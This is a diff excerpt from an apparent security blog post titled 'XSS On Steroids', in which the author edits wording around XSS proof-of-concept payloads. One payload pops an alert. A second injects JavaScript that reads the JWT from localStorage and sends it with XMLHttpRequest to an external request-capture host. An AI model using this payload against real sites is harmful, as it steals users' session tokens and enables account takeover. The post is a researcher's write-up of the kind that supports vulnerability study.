J0LGER/bloghub/_posts/2023-04-10-XSS-On-Steroids.md

 test' },'*')} else alert('poc');//
 ```

- This can be also leveraged to steal the JWT token of the authenticated token:
+ This can be also leveraged to steal the authenticated JWT token:

 ```
 test' },'*')} else { const xhr = new XMLHttpRequest();xhr.open('GET', '[https://](https://enxwjqx3bxw4.x.pipedream.net/)<your server>' + localStorage.getItem('token'));xhr.send(); }//